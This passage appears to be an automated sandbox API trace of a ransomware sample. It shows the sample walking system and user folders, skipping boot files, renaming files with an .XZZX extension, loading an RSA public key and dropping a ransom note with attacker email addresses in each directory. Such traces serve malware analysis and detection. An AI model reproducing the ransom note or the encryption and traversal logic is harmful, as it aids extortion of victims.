pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0226.358] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0226.358] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1068) returned 0x0 [0226.358] RegQueryValueExW (in: hKey=0x1068, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3caf558, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3caf558*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0226.358] RegCloseKey (hKey=0x1068) returned 0x0 [0226.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0226.359] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0226.359] CreateFileW (lpFileName="C:\\Program Files\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\program files\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1068 [0226.359] CloseHandle (hObject=0x1068) returned 1 [0226.359] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43728b8 [0226.359] PathFindFileNameW (pszPath="C:\\Program Files") returned="Program Files" [0226.359] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files" | out: lpString1="Program Files") returned="Program Files" [0226.359] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0226.359] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0226.359] lstrcatW (in: lpString1="C:\\", lpString2="Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0226.359] SetErrorMode (uMode=0x1) returned 0x1 [0226.359] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0226.359] lstrcatW (in: lpString1="C:\\Program Files (x86)", lpString2="\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\" [0226.359] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Program Files (x86)\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\" [0226.359] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="*.*" | out: lpString1="C:\\Program Files (x86)\\*.*") returned="C:\\Program Files (x86)\\*.*" [0226.359] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43728b8 [0226.359] PathFindFileNameW (pszPath="C:\\Program Files (x86)") returned="Program Files (x86)" [0226.359] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files (x86)" | out: lpString1="Program Files (x86)") returned="Program Files (x86)" [0226.359] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files (x86)" | out: lpString1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0226.359] lstrcatW (in: lpString1="C:\\Program Files (x86)", lpString2="\\*.*" | out: lpString1="C:\\Program Files (x86)\\*.*") returned="C:\\Program Files (x86)\\*.*" [0226.359] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="Desktop") returned 0x0 [0226.360] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="DESKTOP") returned 0x0 [0226.360] SetErrorMode (uMode=0x1) returned 0x1 [0226.360] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Program Files (x86)\\_HELP_INSTRUCTION.TXT") returned 44 [0226.360] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0226.360] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0226.360] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1068) returned 0x0 [0226.360] RegQueryValueExW (in: hKey=0x1068, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3caf788, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3caf788*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0226.360] RegCloseKey (hKey=0x1068) returned 0x0 [0226.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0226.360] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0226.360] CreateFileW (lpFileName="C:\\Program Files (x86)\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\program files (x86)\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1068 [0226.360] CloseHandle (hObject=0x1068) returned 1 [0226.360] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43728b8 [0226.360] PathFindFileNameW (pszPath="C:\\Program Files (x86)") returned="Program Files (x86)" [0226.360] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files (x86)" | out: lpString1="Program Files (x86)") returned="Program Files (x86)" [0226.361] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0226.361] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0226.361] lstrcatW (in: lpString1="C:\\", lpString2="ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0226.361] SetErrorMode (uMode=0x1) returned 0x1 [0226.361] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0226.361] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0226.361] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\ProgramData\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0226.361] lstrcatW (in: lpString1="C:\\ProgramData\\", lpString2="*.*" | out: lpString1="C:\\ProgramData\\*.*") returned="C:\\ProgramData\\*.*" [0226.361] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43728b8 [0226.361] PathFindFileNameW (pszPath="C:\\ProgramData") returned="ProgramData" [0226.361] lstrcpyW (in: lpString1=0x17e824, lpString2="ProgramData" | out: lpString1="ProgramData") returned="ProgramData" [0226.361] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0226.361] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\*.*") returned="C:\\ProgramData\\*.*" [0226.361] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch="Desktop") returned 0x0 [0226.361] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch="DESKTOP") returned 0x0 [0226.361] SetErrorMode (uMode=0x1) returned 0x1 [0226.361] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\ProgramData\\_HELP_INSTRUCTION.TXT") returned 36 [0226.361] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0226.361] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0226.361] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1068) returned 0x0 [0226.362] RegQueryValueExW (in: hKey=0x1068, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3caf9b8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3caf9b8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0226.362] RegCloseKey (hKey=0x1068) returned 0x0 [0226.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0226.362] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0226.362] CreateFileW (lpFileName="C:\\ProgramData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\programdata\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1068 [0226.362] CloseHandle (hObject=0x1068) returned 1 [0226.362] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43728b8 [0226.362] PathFindFileNameW (pszPath="C:\\ProgramData") returned="ProgramData" [0226.362] lstrcpyW (in: lpString1=0x17e824, lpString2="ProgramData" | out: lpString1="ProgramData") returned="ProgramData" [0226.362] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0226.362] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0226.362] lstrcatW (in: lpString1="C:\\", lpString2="Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0226.362] SetErrorMode (uMode=0x1) returned 0x1 [0226.362] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0226.362] lstrcatW (in: lpString1="C:\\Recovery", lpString2="\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\" [0226.362] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Recovery\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\" [0226.362] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="*.*" | out: lpString1="C:\\Recovery\\*.*") returned="C:\\Recovery\\*.*" [0226.362] FindFirstFileW (in: lpFileName="C:\\Recovery\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0226.362] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0226.362] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0226.363] lstrcatW (in: lpString1="C:\\Recovery", lpString2="\\*.*" | out: lpString1="C:\\Recovery\\*.*") returned="C:\\Recovery\\*.*" [0226.363] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="Desktop") returned 0x0 [0226.363] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="DESKTOP") returned 0x0 [0226.363] SetErrorMode (uMode=0x1) returned 0x1 [0226.363] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Recovery\\_HELP_INSTRUCTION.TXT") returned 33 [0226.363] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0226.363] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0226.363] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1068) returned 0x0 [0226.363] RegQueryValueExW (in: hKey=0x1068, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cafbe8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cafbe8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0226.363] RegCloseKey (hKey=0x1068) returned 0x0 [0226.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0226.363] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0226.363] CreateFileW (lpFileName="C:\\Recovery\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\recovery\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0226.363] CreateFileW (lpFileName="C:\\Recovery\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\recovery\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0226.363] FindFirstFileW (in: lpFileName="C:\\Recovery\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0226.364] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0226.364] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.364] lstrcmpW (lpString1="System Volume Information", lpString2="..") returned 1 [0226.364] lstrcmpW (lpString1="System Volume Information", lpString2=".") returned 1 [0226.364] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0226.364] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0226.364] lstrcatW (in: lpString1="C:\\", lpString2="System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information" [0226.364] SetErrorMode (uMode=0x1) returned 0x1 [0226.364] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information" [0226.364] lstrcatW (in: lpString1="C:\\System Volume Information", lpString2="\\" | out: lpString1="C:\\System Volume Information\\") returned="C:\\System Volume Information\\" [0226.364] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\System Volume Information\\" | out: lpString1="C:\\System Volume Information\\") returned="C:\\System Volume Information\\" [0226.364] lstrcatW (in: lpString1="C:\\System Volume Information\\", lpString2="*.*" | out: lpString1="C:\\System Volume Information\\*.*") returned="C:\\System Volume Information\\*.*" [0226.364] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0226.364] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0226.364] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\System Volume Information" | out: lpString1="C:\\System Volume Information") returned="C:\\System Volume Information" [0226.364] lstrcatW (in: lpString1="C:\\System Volume Information", lpString2="\\*.*" | out: lpString1="C:\\System Volume Information\\*.*") returned="C:\\System Volume Information\\*.*" [0226.364] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="Desktop") returned 0x0 [0226.364] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="DESKTOP") returned 0x0 [0226.364] SetErrorMode (uMode=0x1) returned 0x1 [0226.364] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\System Volume Information\\_HELP_INSTRUCTION.TXT") returned 50 [0226.364] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0226.364] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0226.364] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1068) returned 0x0 [0226.365] RegQueryValueExW (in: hKey=0x1068, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cafe18, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cafe18*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0226.365] RegCloseKey (hKey=0x1068) returned 0x0 [0226.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0226.365] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0226.365] CreateFileW (lpFileName="C:\\System Volume Information\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\system volume information\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0226.365] CreateFileW (lpFileName="C:\\System Volume Information\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\system volume information\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0226.365] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0226.365] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0226.365] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0226.365] lstrcmpW (lpString1="Users", lpString2="..") returned 1 [0226.365] lstrcmpW (lpString1="Users", lpString2=".") returned 1 [0226.365] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0226.365] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0226.365] lstrcatW (in: lpString1="C:\\", lpString2="Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0226.365] SetErrorMode (uMode=0x1) returned 0x1 [0226.365] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0226.365] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0226.365] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0226.365] lstrcatW (in: lpString1="C:\\Users\\", lpString2="*.*" | out: lpString1="C:\\Users\\*.*") returned="C:\\Users\\*.*" [0226.365] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43728b8 [0226.366] PathFindFileNameW (pszPath="C:\\Users") returned="Users" [0226.366] lstrcpyW (in: lpString1=0x17e824, lpString2="Users" | out: lpString1="Users") returned="Users" [0226.366] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0226.366] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="ntldr") returned 0x0 [0226.366] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="NTLDR") returned 0x0 [0226.366] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0226.366] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="ntdetect.com") returned 0x0 [0226.366] StrStrW (lpFirst="C:\\Users\\", lpSrch="Desktop") returned 0x0 [0226.366] StrStrW (lpFirst="C:\\Users\\", lpSrch="DESKTOP") returned 0x0 [0226.366] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\") returned 13 [0226.366] lstrcpyA (in: lpString1=0x17ea5c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0226.366] lstrcpyW (in: lpString1=0x17f05c, lpString2="D2D9507033A5E4DB82B20D90383EC923.XZZX" | out: lpString1="D2D9507033A5E4DB82B20D90383EC923.XZZX") returned="D2D9507033A5E4DB82B20D90383EC923.XZZX" [0226.366] lstrcpyW (in: lpString1=0x17ec5c, lpString2="\\\\?\\C:\\Users\\" | out: lpString1="\\\\?\\C:\\Users\\") returned="\\\\?\\C:\\Users\\" [0226.366] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17ea5c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1078 [0226.366] Sleep (dwMilliseconds=0x96) [0226.517] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0226.517] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0226.517] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0226.517] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0226.517] lstrcmpW 